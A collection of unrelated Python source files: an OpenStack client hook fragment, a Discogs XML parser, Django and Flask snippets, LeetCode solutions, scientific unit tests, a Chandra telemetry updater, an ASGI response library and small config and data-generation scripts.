action=parseractions.MultiKeyValueAction,
required_keys=['flow-id', 'dest-ip'],
optional_keys=['direction'],
help=_("APIC ERSPAN configuration\n"
"Custom data to be passed as apic:erspan_config\n"
"Data is passed as <key>=<value>, where "
"valid keys are 'flow-id', 'dest-ip', and 'direction'\n"
"Required keys: flow-id, dest-ip\n"
"Optional keys: direction\n"
"Syntax Example: dest-ip=10.0.0.0,flow-id=1 "
"or dest-ip=10.0.0.0,flow-id=1,direction=in ")
)
parser.add_argument(
'--no-apic-erspan-config',
dest='no_apic_erspan_config',
action='store_true',
help=_("No APIC ERSPAN configuration\n"
"Clear the apic:erspan_config configuration ")
)
return parser
def get_epilog(self):
return ''
def before(self, parsed_args):
return parsed_args
def after(self, parsed_args, return_code):
return return_code
class ShowPortExtension(hooks.CommandHook):
def get_parser(self, parser):
return parser
def get_epilog(self):
return ''
def before(self, parsed_args):
return parsed_args
def after(self, parsed_args, return_code):
return return_code
|
import re
import csv
import datetime
import dateutil
from dateutil.parser import parse
# xml input: change this path as needed based on where you're keeping the discogs xml dump
inputFile = './discogs_20161001_releases.xml'
# csv output: change this path based on where you want to write the csv
outputFile = open('./output.csv', 'w', newline='', encoding = 'utf-8')
outputWriter = csv.writer(outputFile)
# declare counters
numLines = 0
numRels = 0
numGenres = 0
numStyles = 0
numCountries = 0
numDates = 0
# declare data point lists...
allIds = []
allDates = []
allYears = []
allGenres = []
allStyles = []
allCountries = []
currentDate = ""
# patterns to match for date / year processing
datePatternA = re.compile("\d{4}-\d{2}-\d{2}")
datePatternB = re.compile("\d{4}") # this sometimes misses?
datePatternC = re.compile("\d{2}\/\d{2}\/\d{2}")
# for each line in the file, extract and store various data points
with open(inputFile, 'r', encoding='utf-8') as file:
for line in file:
numLines += 1
if line.startswith('<release '): # if the line is a release...
numRels += 1
allIds.append(line.split('<release id="')[1].split('" status=')[0]) # store the release ID
if line.find('<genre>') != -1: # store genre if exists
numGenres += 1
allGenres.append(line.split('<genre>')[1].split('</genre>')[0])
else:
allGenres.append("empty")
if line.find('<style>') != -1: # store style if exists
numStyles += 1
allStyles.append(line.split('<style>')[1].split('</style>')[0])
else:
allStyles.append("empty")
if line.find('<country>') != -1: # store country if exists
numCountries += 1
allCountries.append(line.split('<country>')[1].split('</country>')[0])
else:
allCountries.append("empty")
if line.find('<released>') != -1: # store release date, extract and store year if they exist
numDates += 1
currentDate = line.split('<released>')[1].split('</released>')[0]
allDates.append(currentDate)
if datePatternA.match(currentDate):
allYears.append(currentDate[:4])
elif datePatternB.match(currentDate):
allYears.append(currentDate[:4])
elif datePatternC.match(currentDate):
allYears.append(currentDate[5:])
else:
allYears.append("miss") # if the regexs can't capture this date format, record a miss
else:
allDates.append("empty")
allYears.append("empty")
# print some basic stats about the file
print ("Total lines: ", numLines)
print ("Total releases: ", numRels)
print ("Total release dates: ", numDates)
# if these totals aren't equal, there's an issue with the parsing
print (" ")
print ("These counts should be equal:")
print ("Collected release IDs: ", len(allIds))
print ("Collected genres: ", len(allGenres))
print ("Collected styles: ", len(allStyles))
print ("Collected countries: ", len(allCountries))
print ("Collected release dates: ", len(allDates))
print ("Parsed release years: ", len(allYears))
print (" ")
print ('Writing CSV...')
# write the index row on the csv
outputWriter.writerow(['id', 'genre', 'style', 'country', 'releaseDate', 'year'])
# write all parameters to csv
for i in range(numRels):
outputWriter.writerow([allIds[i], allGenres[i], allStyles[i], allCountries[i], allDates[i], allYears[i]])
# close the csv
outputFile.close()
# confirmation that process is complete yay!
print ('Success!')
|
from moduleassign import modules as m
# from mod import *
print(dir(m))
#~ r = m.rangegenerator()
#~ print(r)
#~ reversedVals = m.reverser(r)
#~ print(reversedVals)
#~ evens = m.evener(r)
#~ print(evens)
#~ odds = m.odder(r)
#~ print(odds)
|
from django.contrib import admin
from .models import CustomUser as User
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
list_display = ("username", "email", "plan", "is_staff", "is_active")
|
# Write a script called "stats.py" that prints the
# mean, median, mode, range, variance, and standard deviation
# for the Alcohol and Tobacco dataset with full text
# (ex. "The range for the Alcohol and Tobacco dataset is ...").
# Push the code to Github and enter the link below.
import pandas as pd
import pdb
data = '''Region, Alcohol, Tobacco
North, 6.47, 4.03
Yorkshire, 6.13, 3.76
Northeast, 6.19, 3.77
East Midlands, 4.89, 3.34
West Midlands, 5.63, 3.47
East Anglia, 4.52, 2.92
Southeast, 5.89, 3.20
Southwest, 4.79, 2.71
Wales, 5.27, 3.53
Scotland, 6.08, 4.51
Northern Ireland, 4.02, 4.56'''
# First, split the string on the (hidden characters that indicate) newlines
data = data.splitlines() # we could also do data.split('\n')
# Then, split each item in this list on the commas
# the bracketed expression is a list comprehension
data = [i.split(', ') for i in data]
# Now, convert create a pandas dataframe
column_names = data[0] # this is the first row
data_rows = data[1::] # these are all the following rows of data
df = pd.DataFrame(data_rows, columns=column_names)
df['Alcohol'] = df['Alcohol'].astype(float)
df['Tobacco'] = df['Tobacco'].astype(float)
#pdb.set_trace() #debugger
alcr = max(df['Alcohol']) - min(df['Alcohol'])
alcm = df['Alcohol'].mean()
alcs = df['Alcohol'].std()
alcv = df['Alcohol'].var()
tobr = max(df['Tobacco']) - min(df['Tobacco'])
tobm = df['Tobacco'].mean()
tobs = df['Tobacco'].std()
tobv = df['Tobacco'].var()
print "alcohol mean is ", alcm
print "alcohol range is ", alcr
print "alcohol standard deviation is ", alcs
print "alcohol variance is ", alcv
print "Tobacco mean is ", tobm
print "Tobacco range is ", tobr
print "Tobacco standard deviation is ", tobs
print "Tobacco variance is ", tobv
|
from flask import Flask, session, app, render_template, request, Markup
import sys, io, re
import os, base64
from io import StringIO
from datetime import datetime
import time
app = Flask(__name__)
# get root path for account in cloud
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# survey page
@app.route("/", methods=['POST', 'GET'])
def survey_page():
message = ''
first_name = ''
last_name = ''
email = ''
gender = ''
are_you_happy = 'Choose one...'
tell_us_more = ''
Family_checked = ''
Friends_checked = ''
Colleagues_checked = ''
# this is a list so create a string to append into csv file
recommend_this_to_string = ''
if request.method == 'POST':
# check that we have all the required fields to append to file
are_you_happy = request.form['are_you_happy']
recommend_this_to = request.form.getlist('recommend_this_to')
tell_us_more = request.form['tell_us_more']
# remove special characters from input for security
tell_us_more = re.sub(r"[^a-zA-Z0-9]","",tell_us_more)
first_name = request.form['first_name']
last_name = request.form['last_name']
email = request.form['email']
date_of_birth = request.form['date_of_birth']
# optional fields
if date_of_birth=='':
date_of_birth = 'NA'
if 'gender' in request.form:
gender = request.form['gender']
else:
gender = 'NA'
# check that essential fields have been filled
message = ''
missing_required_answers_list = []
if are_you_happy == 'Choose one...':
missing_required_answers_list.append('Are you happy?')
if len(recommend_this_to) == 0:
missing_required_answers_list.append('Who would you recommend this survey to?')
else:
for val in recommend_this_to:
recommend_this_to_string += val + ' '
if val == 'Family':
Family_checked = 'checked'
if val == 'Friends':
Friends_checked = 'checked'
if val == 'Colleagues':
Colleagues_checked = 'checked'
if tell_us_more == '':
missing_required_answers_list.append('Tells us more')
if first_name == '':
missing_required_answers_list.append('First name')
if last_name == '':
missing_required_answers_list.append('Last name')
if email == '':
missing_required_answers_list.append('Email')
if len(missing_required_answers_list) > 0:
# return back a string with missing fields
message = '<div class="w3-row-padding w3-padding-16 w3-center"><H3>You missed the following question(s):</H3><font style="color:red;">'
for ms in missing_required_answers_list:
message += '<BR>' + str(ms)
message += '</font></div>'
else:
# append survey answers to file
# create a unique timestamp for this entry
entry_time = datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
# save to file and send thank you note
with open(BASE_DIR + '/surveys/survey_samp_1.csv','a+') as myfile: # use a+ to append and create file if it doesn't exist
myfile.write(
str(entry_time) + ',' +
str(last_name) + ',' +
str(email) + ',' +
str(date_of_birth) + ',' +
str(are_you_happy) + ',' +
str(recommend_this_to_string) + ',' +
str(tell_us_more) + ','
+ '\n')
# return thank-you message
message = '<div class="w3-row-padding w3-padding-16 w3-center"><H2><font style="color:blue;">Thank you for taking the time to complete this survey</font></H2></div>'
return render_template('survey.html',
message = Markup(message),
first_name = first_name,
last_name = last_name,
email = email,
gender = gender,
tell_us_more = tell_us_more,
Family_checked = Family_checked,
Friends_checked = Friends_checked,
Colleagues_checked = Colleagues_checked,
are_you_happy = are_you_happy)
# used only in local mode
if __name__=='__main__':
app.run(debug=True)
|
# -*- coding: utf-8 -*-
import os, sys, re, codecs, binascii, cgi, cgitb, datetime, pickle
from msg import *
import json
cgitb.enable()
sys.stdout = codecs.getwriter('utf-8')(sys.stdout.detach())
def main():
q = cgi.FieldStorage()
print("Content-type: application-json; charset=utf-8\n\n")
r = {'ids': [["one" , 1], ["two", 2]]}
print(json.dumps(r))
main()
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# Given an unsorted array of integers, find the length of longest increasing subsequence.
# For example,
# Given [10, 9, 2, 5, 3, 7, 101, 18],
# The longest increasing subsequence is [2, 3, 7, 101], therefore the length is 4.
# Note that there may be more than one LIS combination, it is only necessary for you to return the length.
# Your algorithm should run in O(n2) complexity.
# Follow up: Could you improve it to O(n log n) time complexity?
# Credits:
# Special thanks to @pbrother for adding this problem and creating all test cases.
# 24 / 24 test cases passed.
# Status: Accepted
# Runtime: 1468 ms
# Your runtime beats 6.41 % of python submissions.
# DP Formula: DP[i] = max(DP[j] + 1, DP[i]), nums[j] is all numbers that bigger than the nums[i].
class Solution(object):
def lengthOfLIS(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
dp = len(nums) * [1]
for i in range(len(nums), -1, -1):
for j in range(i, len(nums)):
if nums[i] < nums[j]:
dp[i] = max(dp[j] + 1, dp[i])
return max(dp)
# Binary Search.
class Solution(object):
def lengthOfLIS(self, nums):
tails = [0] * len(nums)
size = 0
for x in nums:
i, j = 0, size
while i != j:
m = (i + j) // 2
if tails[m] < x:
i = m + 1
else:
j = m
tails[i] = x
size = max(i + 1, size)
return size
# Runtime: 48 ms
if __name__ == '__main__':
print(Solution().lengthOfLIS([10, 9, 2, 5, 3, 7, 101, 18]))
print(Solution().lengthOfLIS([10,9,2,5,3,4]))
print(Solution().lengthOfLIS([]))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
import os
import unittest
from scipy import linalg
from .. import auxfn_vers2 as auxfn
from ..model.io_triangle import IOTriangle as green
from . import test_tools
currentdir = os.path.join(os.getcwd(), "mea/tests")
@unittest.skip("This class is equivalent to GFAux.")
class TestGFAuxC(unittest.TestCase):
""" A class that implements tests for the Auxiliary green function class. If input is given
as a sE file of a cluster, then it builds an auxiliary GF (it can do so
for real or complex frequencies. However, imaginary frequencies is implicit).
However, if an auxiliary green function file is given,
it can extract the self energy (it is implicit then that the frequencies
are on the real axis"""
@classmethod
def setUpClass(TestGFAux):
print("\nIn testauxfn_vers2.\n")
def test_init(self):
""" """
fin_sE_to = os.path.join(currentdir, "files/self_moy.dat")
gf_aux = auxfn.GFAuxC(fin_sE_to=fin_sE_to)
self.assertEqual(gf_aux.zn_col, 0)
self.assertEqual(gf_aux.fin_sE_to, fin_sE_to)
self.assertEqual(gf_aux.fout_sE_ctow, "self_ctow.dat")
self.assertEqual(gf_aux.fout_gf_aux_to, "gf_aux_to.dat")
def test_build_gfvec_aux(self):
""" """
mu = 2.1
fin_sE_to = os.path.join(currentdir, "files/self_short_moy.dat")
gf_aux = auxfn.GFAuxC(fin_sE_to=fin_sE_to, mu=mu)
gf_aux2 = auxfn.GFAuxC(fin_sE_to=fin_sE_to, rm_sE_ifty=True, mu=mu)
gf_aux.build_gfvec_aux()
gf_aux2.build_gfvec_aux()
zn_vec = np.array([5.235989e-002, 1.570800e-001, 2.6179900e-001, 1.5027299e+001])
sE_t = np.array([
[ 7.29148945e+00 -1.25688297e+00j, 4.31791692e+00 -7.37366863e-01j,
-4.37618486e+00 +7.44382438e-01j, 6.02348575e+00 -9.90968651e-01j,
4.05606418e+00 -4.07146712e-01j, 2.59560959e-01 -3.97514439e-03j],
[ 6.37534240e+00 -3.08656815e+00j , 3.92112500e+00 -1.86394356e+00j,
-3.80134014e+00 +1.78496589e+00j , 5.15813767e+00 -2.33078630e+00j,
3.66679027e+00 -9.42835945e-01j ,2.35758219e-01 -9.62837241e-03j],
[ 5.42233260e+00 -4.06248226e+00j , 3.52542822e+00 -2.58309048e+00j,
-3.22922418e+00 +2.29211959e+00j , 4.28316747e+00 -2.88633370e+00j,
3.28618116e+00 -1.15036779e+00j , 2.02677966e-01 -1.32361189e-02j],
[ 5.55747767e+00 -2.25696764e+00j , 5.68107370e+00 -2.11065758e+00j,
-2.65143495e-01 +3.18872569e-02j , 6.68961495e-02 +1.31238862e-02j,
7.97463733e-02 +5.27132295e-02j , 3.05312358e-03 -2.81419793e-02j]
]
)
sEvec_c = np.zeros((zn_vec.shape[0], 4, 4), dtype=complex)
sEvec_c[:, 0, 0] = sE_t[:, 0] ; sEvec_c[:, 0, 1] = sE_t[:, 2] ; sEvec_c[:, 0, 2] = sE_t[:, 3] ; sEvec_c[:, 0, 3] = sE_t[:, 2]
sEvec_c[:, 1, 0] = sEvec_c[:, 0, 1]; sEvec_c[:, 1, 1] = sE_t[:, 1] ; sEvec_c[:, 1, 2] = sEvec_c[:, 0, 1] ; sEvec_c[:, 1, 3] = sE_t[:, 4]
sEvec_c[:, 2, 0] = sEvec_c[:, 0, 2] ; sEvec_c[:, 2, 1] = sEvec_c[:, 1, 2] ; sEvec_c[:, 2, 2] = sEvec_c[:, 0, 0] ; sEvec_c[:, 2, 3] = sEvec_c[:, 0, 1]
sEvec_c[:, 3, 0] = sEvec_c[:, 0, 3] ; sEvec_c[:, 3, 1] = sEvec_c[:, 1, 3] ; sEvec_c[:, 3, 2] = sEvec_c[:, 2, 3] ; sEvec_c[:, 3, 3] = sEvec_c[:, 1, 1]
sEvec_ir = green().c_to_ir(sEvec_c)
sE_ifty = green().read_green_infty(sEvec_ir)
# now let us form the gf_aux
gfvec_test_c = np.zeros((zn_vec.shape[0], 4, 4), dtype=complex)
gfvec_test_ir = gfvec_test_c.copy()
for (i, sE) in enumerate(sEvec_c.copy()):
zz = 1.0j*zn_vec[i] + mu
gfvec_test_c[i] = linalg.inv(np.eye(4)*zz - sE)
gfvec_test_ir = green().c_to_ir(gfvec_test_c)
try:
np.testing.assert_allclose(gf_aux.zn_vec, zn_vec, rtol=1e-7, atol=1e-7)
np.testing.assert_allclose(gf_aux.sEvec_c, sEvec_c, rtol=1e-7, atol=1e-7)
np.testing.assert_allclose(gf_aux.sE_infty, sE_ifty, rtol=1e-7, atol=1e-7)
np.testing.assert_allclose(gf_aux.sEvec_c[:, 3, 3], sE_t[:, 1], rtol=1e-7, atol=1e-7)
np.testing.assert_allclose(gf_aux.gfvec_aux_c.shape, gfvec_test_c.shape, rtol=1e-7, atol=1e-7)
# np.testing.assert_allclose(gf_aux.gfvec_aux_c, gfvec_test_c, rtol=1e-7, atol=1e-7)
# np.testing.assert_allclose(gf_aux2.gfvec_aux_ir, gfvec_test_ir, rtol=1e-7, atol=1e-7)
# np.testing.assert_allclose(gf_aux.gfvec_aux_ir, gfvec_test_ir2, rtol=1e-7, atol=1e-7)
except AssertionError:
self.fail("ayaya np.allclose failed at test_build_gf_aux")
# def test_ac(self):
# """ """
# fin_sE_to = os.path.join(currentdir, "files/self_moyb60U3n05.dat")
# gf_aux = auxfn.GFAux(fin_sE_to=fin_sE_to, rm_sE_ifty=False)
# gf_aux.build_gfvec_aux()
# gf_aux.ac(fin_OME_default=os.path.join(currentdir, "files/OME_default.dat"), \
# fin_OME_other=os.path.join(currentdir, "files/OME_other.dat"), \
# fin_OME_input=os.path.join(currentdir, "files/OME_input_test.dat")
# )
# # gf_aux.get_sE_w_list() put this line in the next test
# Aw_manual_small_truncation = np.loadtxt(os.path.join(currentdir,"files/Aw_manual_small_truncation.dat"))
# w_n_manual = Aw_manual_small_truncation[:, 0]
# Aw_manual = np.delete(Aw_manual_small_truncation,0, axis=1)
# w_n =gf_aux.w_vec_list[0]
# Aw = gf_aux.Aw_t_list[0][:, 0][:, np.newaxis]
# # print("Aw.shape = ", Aw.shape)
# # print(Aw_manual.shape)
# try:
# np.testing.assert_allclose(w_n.shape, w_n_manual.shape)
# np.testing.assert_allclose(Aw.shape, Aw_manual.shape)
# test_tools.compare_arrays(w_n, w_n_manual, rprecision=10**-2, n_diff_max=5, zero_equivalent=10**-5)
# test_tools.compare_arrays(Aw, Aw_manual, rprecision=10**-2, n_diff_max=5, zero_equivalent=10**-5)
# except AssertionError:
# self.fail("ayaya np.allclose failed at test_build_gf_aux")
# def test_get_sEvec_w(self):
# """ """
# #print("\n\n IN test_get_sE_w \n\n")
# fin_sE_to = os.path.join(currentdir, "files/self_moy.dat")
# gf_aux = auxfn.GFAux(fin_sE_to=fin_sE_to, rm_sE_ifty=False)
# gf_aux.build_gfvec_aux()
# gf_aux.ac(fin_OME_default=os.path.join(currentdir, "files/OME_default.dat"), \
# fin_OME_other=os.path.join(currentdir, "files/OME_other.dat"), \
# fin_OME_input=os.path.join(currentdir, "files/OME_input_get_sE.dat")
# )
# gf_aux.get_sEvec_w_list()
# sE_w_to_test = np.loadtxt("self_ctow0.dat")
# sE_w_to_test_good = np.loadtxt(os.path.join(currentdir, "files/self_ctow_test_good.dat"))
# try:
# # print("SHAPEs in test_auxiliary = ", sE_w_to_test.shape, " ", sE_w_to_test_good.shape)
# arr1 = sE_w_to_test.flatten()
# arr2 = sE_w_to_test_good.flatten()
# for i in range(arr1.shape[0]):
# if abs(arr1[i]) > 10**-2.0:
# tmp = abs(arr1[i] - arr2[i])/abs(arr1[i])
# if tmp > 10**-2.0:
# print(tmp)
# test_tools.compare_arrays(sE_w_to_test, sE_w_to_test_good, rprecision=10**-2, n_diff_max=10, zero_equivalent=10**-2)
# #np.testing.assert_allclose(sE_w_to_test, sE_w_to_test_good, rtol=1e-3)
# except AssertionError:
# self.fail("Ayaya, np.allclose failed at test_get_sE_w")
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################################
# #
# update_dea_rdb.py: update DS deahk realated rdb files #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 04, 2021 #
# #
#############################################################################################
import os
import sys
import re
import string
import random
import operator
import math
import numpy
import time
import subprocess
import Chandra.Time
import unittest
#
#--- set environment for "getnrt"
#
from Ska.Shell import getenv, bash
ascdsenv = getenv('source /home/ascds/.ascrc -r release; source /home/mta/bin/reset_param', shell='tcsh')
ascdsenv['IPCL_DIR'] = "/home/ascds/DS.release/config/tp_template/P011/"
ascdsenv['ACORN_GUI'] = "/home/ascds/DS.release/config/mta/acorn/scripts/"
ascdsenv['LD_LIBRARY_PATH'] = "/home/ascds/DS.release/lib:/home/ascds/DS.release/ots/lib:/soft/SYBASE_OSRV15.5/OCS-15_0/lib:/home/ascds/DS.release/otslib:/opt/X11R6/lib:/usr/lib64/alliance/lib"
ascdsenv['ACISTOOLSDIR'] = "/data/mta/Script/Dumps/Scripts"
#
#--- read directory list
#
path = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
sys.path.append(bin_dir)
sys.path.append(mta_dir)
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time()*random.random())
zspace = '/tmp/zspace' + str(rtail)
resolution = 300
#
#NOTE: this is a replacement for the old perl scripts: out2in.pl average.pl prep.perl
#
#-----------------------------------------------------------------------------------------------
#-- update_dea_rdb: update DS deahk realated rdb files --
#-----------------------------------------------------------------------------------------------
def update_dea_rdb():
"""
update DS deahk realated rdb files
input: none but read from: <house_keeping>/today_dump_files
output: <ds_dir>/deahk_temp <ds_dir>/deahk_elec
"""
#
#--- make backup first
#
cmd = 'cp ' + ds_dir + 'deahk_temp.rdb ' + ds_dir + 'deahk_temp.rdb~'
os.system(cmd)
cmd = 'cp ' + ds_dir + 'deahk_elec.rdb ' + ds_dir + 'deahk_elec.rdb~'
os.system(cmd)
#
#--- read today's dump list
#
dfile = house_keeping + 'today_dump_files'
data = mcf.read_data_file(dfile)
for ent in data:
ifile = '/dsops/GOT/input/' + ent + '.gz'
#
#--- run Peter Ford's scripts and pipe into deakh.py
#
cmd1 = "/usr/bin/env PERL5LIB='' "
#cmd2 = '/bin/gzip -dc ' + ifile + '|' + bin_dir + 'getnrt -O | ' + bin_dir + 'deahk.py'
cmd2 = '/bin/gzip -dc ' + ifile + '|' + bin_dir + 'getnrt -O | ' + bin_dir + 'deahk.pl'
cmd = cmd1 + cmd2
bash(cmd, env=ascdsenv)
if os.path.isfile('./deahk_temp.tmp'):
process_deahk('deahk_temp')
if os.path.isfile('./deahk_elec.tmp'):
process_deahk('deahk_elec')
#-----------------------------------------------------------------------------------------------
#-- process_deahk: process deahk data to match dataseeker data format --
#-----------------------------------------------------------------------------------------------
def process_deahk(dtype):
"""
process deahk data to match dataseeker data format
input: dtype --- data type; either deahk_temp or deahk_elec
we assume that the input file name is ./<dtype>.tmp
output: <ds_dir>/<dtype>.rdb
"""
#
#--- we assume that input data file is in the current direcotry with sufix of ".tmp"
#
ifile = dtype + '.tmp'
rdb = ds_dir + dtype + '.rdb'
data = mcf.read_data_file(ifile, remove=1)
#
#--- convert time in seconds from 1998.1.1
#
cdata = convert_time_format(data)
#
#--- take time average of <resolution>
#
rdata = time_average(cdata)
#
#--- update the rdb file
#
line = ''
for ent in rdata:
line = line + ent + '\n'
with open(rdb, 'a') as fo:
fo.write(line)
#-----------------------------------------------------------------------------------------------
#-- convert_time_format: convert time format from <yyyy>:<ddd>:<hh>:<mm>:<ss> to Chandra time --
#-----------------------------------------------------------------------------------------------
def convert_time_format(data):
"""
convert time format from <ddd>:<seconds> to Chandra time
we assume that the first entry of the list is the time
input: data --- a list of data
output: save --- a list of lists of data with converted time foramt
"""
#
#--- find today's year and ydate
#
out = time.strftime("%Y:%j", time.gmtime())
atemp = re.split(':', out)
year = int(float(atemp[0]))
yday = int(float(atemp[1]))
save = []
for ent in data:
atemp = re.split('\s+', ent)
date = atemp[1]
btemp = re.split(':', date)
ydate = int(btemp[0])
ytime = float(btemp[1])
uyear = year
#
#--- if today's ydate is the first part of the year, it could be possible that
#--- the date is from the last year; make sure tat the correspoinding year is a correct one.
#
if yday < 10:
if ydate > 350:
uyear = year -1
sydate = mcf.add_leading_zero(ydate, dlen=3)
ytime /= 86400.0
hp = ytime * 24
hh = int(hp)
lhh = mcf.add_leading_zero(hh)
mp = (hp - hh) * 60
mm = int(mp)
lmm = mcf.add_leading_zero(mm)
ss = int((mp - mm) * 60)
lss = mcf.add_leading_zero(ss)
stime = str(uyear) + ':' + str(sydate) + ':' + str(lhh) + ':' + str(lmm) + ':' + str(lss)
try:
ctime = Chandra.Time.DateTime(stime).secs
except:
continue
out = ent.replace(date, str(ctime))
save.append(out)
return save
#-----------------------------------------------------------------------------------------------
#-- time_average: compute avg and std for the data for a given resolution --
#-----------------------------------------------------------------------------------------------
def time_average(data):
"""
compute avg and std for the data for a given resolution
input: data --- a list of column data lists
output: mdata --- a list of data
"""
cdata = mcf.separate_data_into_col_data(data)
clen = len(cdata)
dlen = len(cdata[1])
save = []
for k in range(0, clen):
save.append([])
#
#--- time is kept in the second column
#
t_list = cdata[1]
tlast = t_list[0]
mdata = []
for m in range(0, dlen):
if t_list[m] - tlast <= resolution:
for k in range(0, clen):
save[k].append(cdata[k][m])
else:
ncnt = len(save[1])
if ncnt < 1:
for k in range(0, clen):
save[k] = [cdata[k][m]]
tlast = t_list[m]
continue
else:
try:
atime = numpy.mean(save[1])
except:
atime = save[1][int(0.5*ncnt)]
line = "%10e\t%d" % (atime, ncnt)
#
#--- dea data starts from third column
#
for k in range(2, clen):
try:
avg = numpy.mean(save[k])
std = numpy.std(save[k])
except:
avg = 0.0
std = 0.0
line = line + "\t%.4f\t%.5f" % (avg, std)
line = line + '\n'
mdata.append(line)
for k in range(0, clen):
save[k] = [cdata[k][m]]
tlast = t_list[m]
#
#--- compute left over
#
if len(save[1]) > 0:
try:
atime = numpy.mean(save[1])
except:
try:
atime = save[1][0]
except:
atime = 0.0
ncnt = len(save[1])
line = "%8e\t%d" % (atime, ncnt)
for k in range(2, clen):
try:
avg = numpy.mean(save[k])
std = numpy.std(save[k])
except:
avg = 0.0
std = 0.0
line = line + "\t%.4f\t%.5f" % (avg, std)
line = line + '\n'
mdata.append(line)
return mdata
#-----------------------------------------------------------------------------------------------
if __name__ == "__main__":
update_dea_rdb()
|
"""
response schema
"""
import json
import typing
import jinja2
try:
from aiofile import AIOFile
except ImportError:
AIOFile = None
from kumquat._types import Scope, Receive, Send
from kumquat.context import env_var
try:
import ujson
except ImportError:
ujson = None
JSON = json if ujson is None else ujson
class SimpleResponse:
"""
base kumquat response
"""
charset = "utf-8"
content_type = "text/plain"
def __init__(
self,
body: typing.Any,
headers: typing.List[typing.Dict[str, str]] = None,
status_code: int = 200,
):
self.body = body
self._status_code = status_code
self._custom_headers = headers
async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
await send(
{
"type": "http.response.start",
"status": self.status_code,
"headers": self._create_headers(),
}
)
await send({"type": "http.response.body", "body": self.parse_body()})
@property
def custom_headers(self) -> typing.Optional[typing.List[typing.Dict[str, str]]]:
"""
headers property for response
:return:
"""
return self._custom_headers
@custom_headers.setter
def custom_headers(self, value):
self._custom_headers = value
@property
def status_code(self) -> int:
"""
status code property for response
:return:
"""
return self._status_code
@status_code.setter
def status_code(self, value):
self._status_code = value
def _create_headers(self) -> typing.List[typing.List[bytes]]:
_headers = [
[b"content-length", str(len(self.parse_body())).encode(self.charset)],
[
b"content-type",
f"{self.content_type}; charset={self.charset}".encode(self.charset),
],
]
if self.custom_headers is not None:
_header = []
for header in self.custom_headers:
for k, v in header.items():
_header = [k.encode(self.charset), v.encode(self.charset)]
_headers.append(_header)
return _headers
def set_headers(self, headers: typing.Dict[str, str]) -> None:
"""
set headers for response
:param headers:
:return:
"""
if self.custom_headers is None:
self.custom_headers = []
self.custom_headers.append(headers)
def parse_body(self) -> bytes:
"""
encode response body to bytes
:return:
"""
if isinstance(self.body, bytes):
return self.body
if isinstance(self.body, dict):
return JSON.dumps(self.body).encode(self.charset)
return self.body.encode(self.charset)
class TextResponse(SimpleResponse):
content_type = "text/plain"
class HTMLResponse(SimpleResponse):
content_type = "text/html"
class JsonResponse(SimpleResponse):
content_type = "application/json"
class TemplateResponse(SimpleResponse):
"""
response for rendering templates
"""
content_type = "text/html"
def __init__(self, template: str, **kwargs):
super().__init__(b"")
self.template = template
self.template_data = kwargs
async def _render_template(self) -> str:
if env_var.get() == "/":
env_var.set("")
if AIOFile is None:
with open(f"{env_var.get()}{self.template}", "r", encoding="utf-8") as file:
template = jinja2.Template(file.read())
else:
async with AIOFile(
f"{env_var.get()}{self.template}", "r", encoding="utf-8"
) as file:
template = jinja2.Template(await file.read())
return template.render(self.template_data)
async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
self.body = await self._render_template()
await super().__call__(scope, receive, send)
|
# !/bin/python3
import json
import sys
import re
harvester_key = ""
harvester_vrf = ""
node_name = ""
with open('./config.json', 'r') as f:
data = json.load(f)
harvester_key = data["harvesterKey"]
harvester_vrf = data["harvesterVrfKey"]
node_name = data["nodeName"]
params_to_replace = [
{"name": "harvesterSigningPrivateKey =", "param": harvester_key,
"file": "core-node/config/resources/config-harvesting.properties"},
{"name": "harvesterVrfPrivateKey =", "param": harvester_vrf,
"file": "core-node/config/resources/config-harvesting.properties"},
{"name": "friendlyName =", "param": node_name,
"file": "core-node/config/resources/config-node.properties"}]
for param in params_to_replace:
new_param = "{} {}".format(
param["name"], param["param"])
f = open(param["file"], 'r')
filedata = f.read()
f.close()
newdata = re.sub(
r'(?<={})[^\n\s]*'.format(param["name"]), param["param"], filedata)
print(newdata)
f = open(param["file"], 'w')
f.write(newdata)
f.close()
with open('rest/rest.json', 'r') as f:
data = json.load(f)
# other rest options here
data["db"]["url"] = "mongodb://172.28.1.2:27017/"
data["apiNode"]["host"] = "172.28.1.1"
with open('rest/rest.json', 'w') as jsonfile:
json.dump(data, jsonfile, indent=4)
|
import torch
import pandas as pd
import numpy as np
import os
from pathlib import Path
import numpy as np
import os
np.random.seed(123)
os.environ["PYTHONHASHSEED"] = str(123)
torch.manual_seed(123)
VAL = 100
def get_sum_with_max_contribution_per_value(tensor: torch.Tensor):
values = tensor.tolist()
target_val = 0
for value in values:
positive_capped = value if value < (0.5 * VAL) else (0.5 * VAL)
negative_capped = positive_capped if positive_capped > (-0.5 * VAL) else (-0.5 * VAL)
target_val += negative_capped
return target_val
initial_random_data = torch.rand(50000, 4) * VAL
initial_sum_to_1 = initial_random_data - (0.5 * VAL)
# A positive target is one where the sum is over 0.5, and a single value cannot contribute more than 0.5 towards the sum.
targets = torch.tensor(
[
1 if get_sum_with_max_contribution_per_value(tensor) > (0.5 * VAL) else 0
for tensor in initial_sum_to_1
]
)
print("Generated fake data, amount of true targets: ", torch.count_nonzero(targets))
# Create names for columns and insert into csv.
column_names = [f"X_{num}" for num in range(initial_sum_to_1.size()[1])]
df = pd.DataFrame(initial_sum_to_1.numpy(), columns=column_names)
df.insert(0, "Targets", targets)
# Insert locked features
df.insert(len(df.values[0]), "X_4", torch.zeros(50000, 1).numpy())
df.insert(len(df.values[0]), "X_5", torch.zeros(50000, 1).numpy())
# Save CSV
dataDir = Path(__file__).parent.absolute()
df.to_csv(f"{dataDir}/fake_data.csv", index=False)
|
